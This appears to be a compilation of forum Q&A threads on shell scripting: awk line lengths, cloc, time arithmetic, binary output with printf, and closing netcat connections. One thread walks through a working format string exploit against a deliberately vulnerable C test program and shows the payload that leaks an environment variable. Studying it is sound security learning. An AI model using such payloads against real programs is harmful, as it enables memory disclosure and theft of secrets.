Find length of a fixed width file with a little twist

Hi wonderful people, my gurus, and all kind-hearted people.
I have a fixed-width file and I'm trying to find the rows that contain a given number of bytes. I tried a couple of awk commands, but they are not giving me the result I wanted. Each row of my fixed-width file should contain 208 bytes, but a few rows don't. I'm trying to discover the records that don't have 208 bytes.
This command gave me the length of the first row:
awk '{print length;exit}' file.text
Here I tried to print the rows that contain 101 bytes, but it didn't work:
awk '{print length==101}' file.text
Any help or insight would be much appreciated.

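With awk (this prints rows shorter than 208; use != 208 to also catch rows that are too long):
awk 'length() < 208' file
Note that length() gives you the number of characters, not bytes, and the two can differ in a multibyte (e.g. UTF-8) locale. You can set the locale to C to force awk to count bytes. LANG works as long as LC_ALL and LC_CTYPE are unset; LC_ALL=C overrides both:
LANG=C awk 'length() < 208' file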
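To also report which rows are off and by how much, the check can be wrapped in a small helper. This is a minimal sketch, not the answerer's command: report_bad_rows is a hypothetical name, and it assumes Unix line endings (a trailing carriage return would count as one extra byte).

```shell
# Hypothetical helper: list rows whose byte length differs from the expected width.
# $1 = expected width in bytes, $2 = file to check
report_bad_rows() {
    # LC_ALL=C makes length() count bytes rather than locale characters.
    LC_ALL=C awk -v width="$1" 'length($0) != width { print NR ": " length($0) }' "$2"
}

# Usage: report_bad_rows 208 file.text
```

Each output line has the form "row number: actual length", so an empty result means every row has the expected width.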

Perl to the rescue!
perl -lne 'print "$.:", length if length != 208' -- file.text
-n reads the input line by line
-l removes newlines from the input before processing it and adds them to print
The one-liner will print line number ($.) and the length of the line for each line whose length is different than 208.

If you're using gawk, then it's not an issue, even in a typical UTF-8 locale:
length(s)         = # chars native to locale,
                    # typically that means # utf-8 chars
match(s, /$/) - 1 = # raw bytes
                    # this also works for pure-binary
                    # inputs, without triggering
                    # any error messages in gawk Unicode mode
Best illustrated by example:
0000000 3347498554 3381184647 3182945161 171608122
: Ɔ ** Ǉ ** Ȉ ** ɉ ** 㷽 ** ** : 210 : \n
072 306 206 307 207 310 210 311 211 343 267 275 072 210 072 012
: ? 86 ? 87 ? 88 ? 89 ? ? ? : 88 : nl
58 198 134 199 135 200 136 201 137 227 183 189 58 136 58 10
3a c6 86 c7 87 c8 88 c9 89 e3 b7 bd 3a 88 3a 0a
0000020
# gawk profile, created Sat Oct 29 20:32:49 2022
BEGIN {
1 __ = "\306\206\307\207\310" (_="\210") \
"\311\211\343\267\275"
1 print "",__,_
1 STDERR = "/dev/stderr"
1 print ( match(_, /$/) - 1, "_" ) > STDERR # *A
1 print ( length(__), match(__, /$/) - 1 ) > STDERR # *B
1 print ( (__~_), match(__, (_) ".*") ) > STDERR # *C
1 print ( RSTART, RLENGTH ) > STDERR # *D
}
1 | _ *A # of bytes off "_" because it was defined as 0x88 \210
5 | 11 *B # of chars of "__", and
# of bytes of it :
# 4 x 2-byte UC
# + 1 x 3-byte UC = 11
1 | 3 *C # does byte \210 exist among larger string (true/1),
# and which unicode character is 1st to
# contain \210 - the 3rd one, by original definition
3 | 3 *D # notice I also added a ".*" to the tail of this match() :
# if the left-side string being tested is valid UTF-8,
# then this will match all the way to the end of string,
# inclusive, in which you can deduce :
#
# "\210 first appeared in 3rd-to-last utf-8 character"
Combining that inferred understanding :
RLENGTH = "3 chars to the end, inclusive",
with knowledge of how many to its left :
RSTART - 1 = "2 chars before",
yields a total count of 3 + 2 = 5, affirming length()'s result

Related

Line counting - How to exclude a directory and images?

In order to count the lines of my repository, I typed the code below, and found out that images and pdfs are also included in the word count.
git ls-files | xargs wc -l
When someone asks you for the scale of the repository, would you include the images/pdfs?
If not, could someone help me answer the questions below?
How to exclude the files under "/pdfs" directory
How to exclude .jpg and .png?

You can make use of cloc. It counts blank lines, comment lines, and physical lines of source code in many programming languages. Cloc can take file, directory, and/or archive names as inputs. For instance, if you want to count the number of lines of code in your repository and exclude some directories while counting, you can specify those directories separated by comma like this:
cloc --exclude-dir=imagedir,pdfdir your_repository
cloc will show you the report like this:
387 text files.
387 unique files.
22 files ignored.
github.com/AlDanial/cloc v 1.88 T=0.97 s (376.5 files/s, 152866.0 lines/s)
-------------------------------------------------------------------------------
Language                     files          blank        comment           code
-------------------------------------------------------------------------------
Go                             235          17216          11769          95308
InstallShield                    2            410              0          11178
XML                             41           1418            159           2738
Python                           5            516            523           1792
Bourne Shell                    21            266            283           1512
JSON                            19             24              0           1005
Markdown                        23            452              0            797
AsciiDoc                         4            119              0            312
Ruby                             4             44             31            238
YAML                             4              4              2            113
WiX source                       1             19             24            112
make                             3             16             25             68
DOS Batch                        2             13              2             38
WiX include                      1              0              0             28
Dockerfile                       1             13              9             17
-------------------------------------------------------------------------------
SUM:                           366          20530          12827         115256
-------------------------------------------------------------------------------
You can also use CLOC with Git like this:
cloc $(git ls-files)
which is equivalent to
git ls-files | xargs cloc
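For the plain wc -l count from the question, the path list can also be filtered before it reaches xargs. A minimal sketch, assuming the directory is named pdfs at the repository root and that no file names contain whitespace (exclude_binaries is a hypothetical helper name, not part of git or cloc):

```shell
# Hypothetical filter: read paths on stdin and drop everything under pdfs/
# as well as .jpg and .png files.
exclude_binaries() {
    grep -Ev '^pdfs/|\.(jpg|png)$'
}

# Usage inside a repository:
#   git ls-files | exclude_binaries | xargs wc -l
```

The pattern is anchored with ^ so that only the top-level pdfs directory is excluded; adjust it if the directory lives elsewhere.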

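cloc sounds like it does the job. If you use command substitution, though, you should remove space and tab from IFS so that file names containing them are not split. Note that a prefix assignment (IFS=$'\n' cloc $(git ls-files)) does not change how the substitution is split; set IFS in a subshell instead: (IFS=$'\n'; cloc $(git ls-files))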
If you just want to know a word count or line count, you could bodge it together like this. It gives you the language too. Clone the repo, test for text file / file type, count lines, delete files.
#!/bin/sh -e
# Get dir name from URL + remove trailing slashes - works for _most_ urls
url=${1:? No URL given}
url=${url%/}; url=${url%/}
repo=${url##*/}   # use the cleaned-up URL, not $1, so a trailing slash is harmless
repo=${repo%.git}
dir=./$repo
# Clone repo in tmp
cd "${TMPDIR:-/tmp}"
[ -e "$dir" ] && { echo Exists: "$dir" >&2; exit 1; }
trap 'rm -rf "$dir"' EXIT INT
git clone "$url"
# Get column 1 width, for alignment (wc -L is a GNU extension)
max_path_length=$(printf '%s\n' "$dir/"* | wc -L)
# Extract and print the data
total_lines=0
printf '\n%s\n\n' "$repo text files details:"
for file in "$dir"/*; do
    mime=$(file --brief --mime-type "$file")
    type=${mime%%/*}
    if [ "$type" = text ]; then
        lines=$(grep -c . "$file") || true   # counts non-empty lines
        lang=${mime##*/}
        printf "%-${max_path_length}s %s\n" "${file#$dir}" "[$lang, $lines lines]"
        total_lines=$((total_lines + lines))
    fi
done
printf '\n%s\n\n' "${dir#./} total lines: $total_lines"
Example output:
$ git-wc 'git://git.savannah.gnu.org/sed.git'
Cloning into 'sed'...
remote: Counting objects: 6276, done.
remote: Compressing objects: 100% (1134/1134), done.
remote: Total 6276 (delta 4994), reused 6276 (delta 4994)
Receiving objects: 100% (6276/6276), 2.14 MiB | 495.00 KiB/s, done.
Resolving deltas: 100% (4994/4994), done.
sed text files details:
/AUTHORS [plain, 6 lines]
/BUGS [plain, 101 lines]
/COPYING [plain, 553 lines]
/ChangeLog-2014 [plain, 2586 lines]
/Makefile.am [x-makefile, 123 lines]
/NEWS [plain, 498 lines]
/README [plain, 12 lines]
/README-hacking [plain, 58 lines]
/THANKS.in [plain, 63 lines]
/basicdefs.h [x-c, 83 lines]
/bootstrap [x-shellscript, 930 lines]
/bootstrap.conf [plain, 121 lines]
/cfg.mk [plain, 343 lines]
/configure.ac [x-m4, 294 lines]
/init.cfg [plain, 163 lines]
/thanks-gen [x-perl, 12 lines]
sed total lines: 5946
If the repo is local, you can just adjust the input methods. I'm sure the idea is clear. I know cloning the whole repo may be the dumbest way to do something like this, but sometimes you just want to know a thing. Plus, in bash you can skip a directory with a pattern test, e.g. [[ "$file" == "$dir"/<exclude-dir>/* ]].

Reading an environment variable using the format string vulnerability in a 64 bit OS

I'm trying to read a value from the environment by using the format string vulnerability.
This type of vulnerability is documented all over the web; however, the examples I've found only cover 32-bit Linux, and my desktop runs 64-bit Linux.
This is the code I'm using to run my tests on:
//fmt.c
#include <stdio.h>
#include <string.h>
int main (int argc, char *argv[]) {
    char string[1024];
    if (argc < 2)
        return 0;
    strcpy( string, argv[1] );
    printf( "vulnerable string: %s\n", string );
    printf( string );
    printf( "\n" );
}
After compiling that, I export my test variable and get its address. Then I pass the address to the program as a parameter, followed by a bunch of format specifiers in order to read the stack:
$ export FSTEST="Look at my horse, my horse is amazing."
$ echo $FSTEST
Look at my horse, my horse is amazing.
$ ./getenvaddr FSTEST ./fmt
FSTEST: 0x7fffffffefcb
$ printf '\xcb\xef\xff\xff\xff\x7f' | od -vAn -tx1c
cb ef ff ff ff 7f
313 357 377 377 377 177
$ ./fmt $(printf '\xcb\xef\xff\xff\xff\x7f')`python -c "print('%016lx.'*10)"`
vulnerable string: %016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.
00000000004052a0.0000000000000000.0000000000000000.00000000ffffffff.0000000000000060.
0000000000000001.00000060f7ffd988.00007fffffffd770.00007fffffffd770.30257fffffffefcb.
$ echo '\xcb\xef\xff\xff\xff\x7f%10$16lx'"\c" | od -vAn -tx1c
cb ef ff ff ff 7f 25 31 30 24 31 36 6c 78
313 357 377 377 377 177 % 1 0 $ 1 6 l x
$ ./fmt $(echo '\xcb\xef\xff\xff\xff\x7f%10$16lx'"\c")
vulnerable string: %10$16lx
31257fffffffefcb
The 10th value contains the address I want to read from, however it's not padded with 0s but with the value 3125 instead.
Is there a way to properly pad that value so I can read the environment variable with something like the '%s' format?

So, after experimenting for a while, I ran into a way to read an environment variable by using the format string vulnerability.
It's a bit sloppy, but hey - it works.
So, first the usual. I create an environment value and find its location:
$ export FSTEST="Look at my horse, my horse is amazing."
$ echo $FSTEST
Look at my horse, my horse is amazing.
$ ./getenvaddr FSTEST ./fmt
FSTEST: 0x7fffffffefcb
Now, no matter how I tried, putting the address before the format specifiers always got the two mixed together, so I moved the address to the end and added some padding of my own, so I could identify it and add more padding if needed.
Also, python and my environment don't get along with some escape sequences, so I ended up using a mix of the python one-liner and printf (with an extra '%' because the outer printf would otherwise interpret a single '%' itself; be sure to remove this extra '%' after you test it with od/hexdump/whatever you prefer).
$ printf `python -c "print('%%016lx|' *1)"\
`$(printf '--------\xcb\xef\xff\xff\xff\x7f\x00') | od -vAn -tx1c
25 30 31 36 6c 78 7c 2d 2d 2d 2d 2d 2d 2d 2d cb
% 0 1 6 l x | - - - - - - - - 313
ef ff ff ff 7f
357 377 377 377 177
With that solved, next step would be to find either the padding or (if you're lucky) the address.
I'm repeating the format string 110 times, but your mileage might vary:
./fmt `python -c "print('%016lx|' *110)"\
`$(printf '--------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|%016lx|%016lx|...|--------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
0000000000000324|...|2d2d2d2d2d2d7c78|7fffffffefcb2d2d|0000038000000300|
00007fffffffd8d0|00007ffff7ffe6d0|--------
The consecutive '2d' values are just the hex values for '-'
After adding more '-' for padding and testing, I ended up with something like this:
./fmt `python -c "print('%016lx|' *110)"\
`$(printf '------------------------------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|%016lx|...|------------------------------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
000000000000033a|...|2d2d2d2d2d2d7c78|2d2d2d2d2d2d2d2d|2d2d2d2d2d2d2d2d|
2d2d2d2d2d2d2d2d|00007fffffffefcb|------------------------------
So, the address got pushed towards the very last format placeholder.
Let's modify the way we output these format placeholders so we can manipulate the last one in a more convenient way:
$ ./fmt `python -c "print('%016lx|' *109 + '%016lx|')"\
`$(printf '------------------------------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|...|------------------------------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
000000000000033a|...|2d2d2d2d2d2d7c78|2d2d2d2d2d2d2d2d|2d2d2d2d2d2d2d2d|
2d2d2d2d2d2d2d2d|00007fffffffefcb|------------------------------
It should show the same result, but now it's possible to use an '%s' as the last placeholder.
Replacing '%016lx|' with just '%s|' won't work, because the extra padding is needed. So, I just add 4 extra '|' characters to compensate:
./fmt `python -c "print('%016lx|' *109 + '||||%s|')"\
`$(printf '------------------------------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|...|||||%s|------------------------------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
000000000000033a|...|2d2d2d2d2d2d7c73|2d2d2d2d2d2d2d2d|2d2d2d2d2d2d2d2d|
2d2d2d2d2d2d2d2d|||||Look at my horse, my horse is amazing.|
------------------------------
Voilà, the environment variable got leaked.
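As for the 3125 seen in the question: the address is only six bytes long, and a command-line argument cannot contain NUL bytes, so the two high bytes of the 8-byte stack word are taken from whatever follows the address in the string (there, the characters % and 1, i.e. 0x25 and 0x31). The sketch below reassembles such a word from its bytes. word_from_bytes is a hypothetical helper, and it assumes a little-endian layout, as on x86-64.

```shell
# Hypothetical helper: read raw bytes on stdin and print them as one
# little-endian hex word (last byte first), the way %lx shows a stack word.
word_from_bytes() {
    od -An -v -tx1 | tr -d ' \n' |
        awk '{ for (i = length($0) - 1; i >= 1; i -= 2) out = out substr($0, i, 2); print out }'
}

# Six address bytes (octal escapes for cb ef ff ff ff 7f) followed by "%1":
printf '\313\357\377\377\377\177%%1' | word_from_bytes
# prints 31257fffffffefcb
```

Moving the address to the end of the string and padding it to an 8-byte boundary, as done above, lets the string's terminating NUL and the zero bytes after it supply the missing high bytes.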

Convert a text into time format using bash script

I am new to shell scripting. I have a tab-separated file, e.g.:
0018803 01 1710 2050 002571
0018951 01 1934 2525 003277
0019362 02 2404 2415 002829
0019392 01 2621 2820 001924
0019542 01 2208 2413 003434
0019583 01 1815 2134 002971
Here, the 3rd and 4th columns represent the start time and end time.
I want to convert these two columns into a proper time format so that I can add a 6th column holding the exact difference between column 4 and column 3 in hours and minutes.
The column 6 results would be 3:40, 5:51, 00:11, 1:59, 2:05, 3:19.

One way with awk:
$ cat test.awk
# create a function to split hour and minute
function f(h, x) {
    h[0] = substr(x,1,2)+0
    h[1] = substr(x,3,2)+0
}
{
    f(start, $3);
    f(end, $4);
    # use >= so that equal minutes give H:00 rather than (H-1):60
    span = end[1] - start[1] >= 0 \
        ? sprintf("%d:%02d", end[0]-start[0], end[1]-start[1]) \
        : sprintf("%d:%02d", end[0]-start[0]-1, 60+end[1]-start[1]);
    print $0 OFS span
}
then run the awk file as the following:
$ awk -f test.awk input_file
Edit: per @glenn jackman's suggestion, the code can be simplified (refer to @Kamil Cuk's method):
function g(x) {
    return substr(x,1,2)*60 + substr(x,3,2)
}
{
    span = g($4) - g($3)
    printf("%s%s%d:%02d\n", $0, OFS, int(span/60), span%60)
}
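The minutes-since-midnight arithmetic can be checked on single values. A minimal sketch (span is a hypothetical wrapper, not part of the answer; it assumes both arguments are four-digit HHMM strings and that the end is not earlier than the start):

```shell
# Hypothetical wrapper: $1 = start HHMM, $2 = end HHMM; prints the span as H:MM.
span() {
    awk -v s="$1" -v e="$2" 'BEGIN {
        # Convert each HHMM value to minutes and subtract.
        d = (substr(e, 1, 2) * 60 + substr(e, 3, 2)) - (substr(s, 1, 2) * 60 + substr(s, 3, 2))
        printf "%d:%02d\n", int(d / 60), d % 60
    }'
}

span 1710 2050   # prints 3:40
span 1710 1810   # prints 1:00
```

The second call covers the case where start and end minutes are equal, which is where a borrow-based calculation is easiest to get wrong.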

A simple bash solution using arithmetic expansion:
while IFS='' read -r l; do
    # split on spaces and tabs, since the input is tab-separated
    IFS=$' \t' read -r _ _ st et _ <<<"$l"
    d=$(( (10#${et:0:2} * 60 + 10#${et:2:2}) - (10#${st:0:2} * 60 + 10#${st:2:2}) ))
    printf "%s %02d:%02d\n" "$l" "$((d/60))" "$((d%60))"
done < input_file_path
will output:
0018803 01 1710 2050 002571 03:40
0018951 01 1934 2525 003277 05:51
0019362 02 2404 2415 002829 00:11
0019392 01 2621 2820 001924 01:59
0019542 01 2208 2413 003434 02:05
0019583 01 1815 2134 002971 03:19

Here is one in GNU awk using its time functions: mktime to convert to epoch time and strftime to format the difference as HH:MM:
$ awk -v OFS="\t" '{
    dt3="1970 01 01 " substr($3,1,2) " " substr($3,3,2) " 00"
    dt4="1970 01 01 " substr($4,1,2) " " substr($4,3,2) " 00"
    print $0,strftime("%H:%M",mktime(dt4)-mktime(dt3),1) # thanks @glennjackman,1 :)
}' file
Output ($6 only):
03:40
05:51
00:11
01:59
02:05
03:19

Emitting a character (or multi-byte binary string) by integer ordinal in bash

I'm trying to echo integer in bash as is, without converting each digit to ASCII and outputting corresponding sequence. e.g.
echo "123" | hd
00000000 31 32 33 0a |123.|
This outputs the ASCII code of each character. How can I output 123 itself, as an unsigned integer for example, so that I get something like:
00000000 0x7B 00 00 00

That's a job for printf
$ printf "\x$(printf '%x' "123")" | hd
00000000 7b |{|
The inner printf converts the decimal number 123 to hexadecimal, and the outer printf uses \x to create a byte with that value.
If you want several bytes, use this:
$ printf '%b' "$(printf '\\x%x' "123" "96" "68")" | hd
00000000 7b 60 44 |{`D|
Or, if you want to use hexadecimal:
$ printf '%b' "$(printf '\\x%x' "0x7f" "0xFF" "0xFF")" | hd
00000000 7f ff ff |...|
Or, in this case, simply:
$ printf '\x7f\xFF\xFF' | hd
00000000 7f ff ff |...|

You have to be careful about endianness. x86 is little-endian, so you must store the least significant byte first.
As an example, if you want to store the 32-bit integer 2'937'252'660d = AF'12'EB'34h on disk, you have to write 0x34, then 0xEB, then 0x12 and then 0xAF, in that order.
I use this helper for the same purpose as yours:
printf "%.8x\n" 2937252660 | fold -b -w2 | tac | while read a; do echo -e -n "\\x${a}"; done
printf converts from decimal to hexadecimal (%.8x pads to eight digits, i.e. four bytes)
fold splits the digits into groups of 2 characters, i.e. 1 byte
tac reverses the lines (this is where little-endian is applied)
the while loop echoes one raw byte at a time

Borrowing the observation from @Setop's answer that the examples imply that the OP wants uint32s, but trying to build a more efficient implementation (involving no subshells or external commands):
print_byte() {
    local val
    printf -v val '%02x' "$1"
    printf '%b' "\x${val}"
}
print_uint32() {
    print_byte "$(( ( $1 / (( 256 ** 0 )) ) % 256 ))"
    print_byte "$(( ( $1 / (( 256 ** 1 )) ) % 256 ))"
    print_byte "$(( ( $1 / (( 256 ** 2 )) ) % 256 ))"
    print_byte "$(( ( $1 / (( 256 ** 3 )) ) % 256 ))"
}
Thus:
print_uint32 32 | xxd # this should be a single space, padded with nulls
...correctly yields:
00000000: 2000 0000 ...
...as demonstrated by reversing it back to the original value with Python's struct.unpack() function:
$ print_uint32 32 |
> python3 -c 'import struct, sys; print(struct.unpack("<I", sys.stdin.buffer.read())[0])'
32
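Where bash's printf -v and \x escapes are not available, the same little-endian output can be produced with the octal escapes that POSIX specifies for printf '%b'. A minimal sketch under that assumption (print_uint32_le is a hypothetical name; unlike the version above it spawns a subshell per byte, trading speed for portability):

```shell
# Hypothetical POSIX-sh variant: emit $1 as four little-endian bytes.
print_uint32_le() {
    n=$1
    for i in 1 2 3 4; do
        # Build an escape such as \0064 and let %b turn it into one raw byte.
        printf '%b' "\\0$(printf '%03o' "$(( n % 256 ))")"
        n=$(( n / 256 ))
    done
}

print_uint32_le 2937252660 | od -An -tx1
# prints the bytes 34 eb 12 af
```

The variables n and i are global here because POSIX sh has no local keyword.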

How can I close a netcat connection after a certain character is returned in the response?

We have a very simple tcp messaging script that cats some text to a server port which returns and displays a response.
The part of the script we care about looks something like this:
cat someFile | netcat somehost 1234
The response the server returns is 'complete' once we get a certain character code (specifically &001C) returned.
How can I close the connection when I receive this special character?
(Note: The server won't close the connection for me. While I currently just CTRL+C the script when I can tell it's done, I wish to be able to send many of these messages, one after the other.)
(Note: netcat -w x isn't good enough because I wish to push these messages through as fast as possible)

Create a bash script called client.sh:
#!/bin/bash
cat someFile
while read -r FOO; do
    echo "$FOO" >&3
    # stop once the line contains the 0x1C byte
    if [[ $FOO =~ $'\x1c' ]]; then
        break
    fi
done
Then invoke netcat from your main script like so:
3>&1 nc -c ./client.sh somehost 1234
(You'll need bash version 3 for the regexp matching).
This assumes that the server is sending data in lines - if not you'll have to tweak client.sh so that it reads and echoes a character at a time.

How about this?
Client side:
awk -v RS=$'\x1c' 'NR==1;{exit 0;}' < /dev/tcp/host-ip/port
Testing:
# server side test script
while true; do ascii -hd; done | { netcat -l 12345; echo closed...;}
# Generate 'some' data for testing & pipe to netcat.
# After netcat connection closes, echo will print 'closed...'
# Client side:
awk -v RS=J 'NR==1; {exit;}' < /dev/tcp/localhost/12345
# Changed end character to 'J' for testing.
# Didn't wish to write a server side script to generate 0x1C.
Client side produces:
0 NUL 16 DLE 32 48 0 64 # 80 P 96 ` 112 p
1 SOH 17 DC1 33 ! 49 1 65 A 81 Q 97 a 113 q
2 STX 18 DC2 34 " 50 2 66 B 82 R 98 b 114 r
3 ETX 19 DC3 35 # 51 3 67 C 83 S 99 c 115 s
4 EOT 20 DC4 36 $ 52 4 68 D 84 T 100 d 116 t
5 ENQ 21 NAK 37 % 53 5 69 E 85 U 101 e 117 u
6 ACK 22 SYN 38 & 54 6 70 F 86 V 102 f 118 v
7 BEL 23 ETB 39 ' 55 7 71 G 87 W 103 g 119 w
8 BS 24 CAN 40 ( 56 8 72 H 88 X 104 h 120 x
9 HT 25 EM 41 ) 57 9 73 I 89 Y 105 i 121 y
10 LF 26 SUB 42 * 58 : 74
After 'J' appears, server side closes & prints 'closed...', ensuring that the connection has indeed closed.
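The read-until-separator step can be isolated and tried without a server. A minimal sketch, assuming the terminator is the single byte 0x1C (read_until_fs is a hypothetical helper name; the wiring in the comments is untested against a real server, and some awk implementations buffer their input, which may delay the exit on a live socket):

```shell
# Hypothetical helper: copy stdin up to (not including) the first 0x1C byte.
read_until_fs() {
    # awk expands the octal escape \034 in a -v assignment to the byte 0x1C.
    awk -v RS='\034' 'NR == 1 { print; exit }'
}

# Possible wiring in bash (somehost and 1234 are the placeholders from the question):
#   exec 3<>/dev/tcp/somehost/1234
#   cat someFile >&3
#   read_until_fs <&3
#   exec 3>&-
```

Opening the socket read-write on one descriptor lets the same connection carry both the request and the response, which the read-only redirection above does not.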

Try:
(cat somefile; sleep $timeout) | nc somehost 1234 | sed -e '{s/\x01.*//;T skip;q;:skip}'
This requires GNU sed.
How it works:
{
s/\x01.*//; # search for \x01, if we find it, kill it and the rest of the line
T skip; # goto label skip if the last s/// failed
q; # quit, printing current pattern buffer
:skip # label skip
}
Note that this assumes there'll be a newline after \x01 - sed won't see it otherwise, as sed operates line-by-line.

Maybe have a look at Ncat as well:
"Ncat is the culmination of many key features from various Netcat incarnations such as Netcat 1.x, Netcat6, SOcat, Cryptcat, GNU Netcat, etc. Ncat has a host of new features such as "Connection Brokering", TCP/UDP Redirection, SOCKS4 client and server supprt, ability to "Chain" Ncat processes, HTTP CONNECT proxying (and proxy chaining), SSL connect/listen support, IP address/connection filtering, plus much more."
http://nmap-ncat.sourceforge.net

This worked best for me. Just read the output with a while loop and check each line for the 0x1c byte using an if statement.
while read -r i; do
    if [[ $i == *$'\x1c'* ]]; then   # Read until a line contains byte 0x1c, then exit
        break
    fi
    echo "$i"
done < <(cat someFile | netcat somehost 1234)
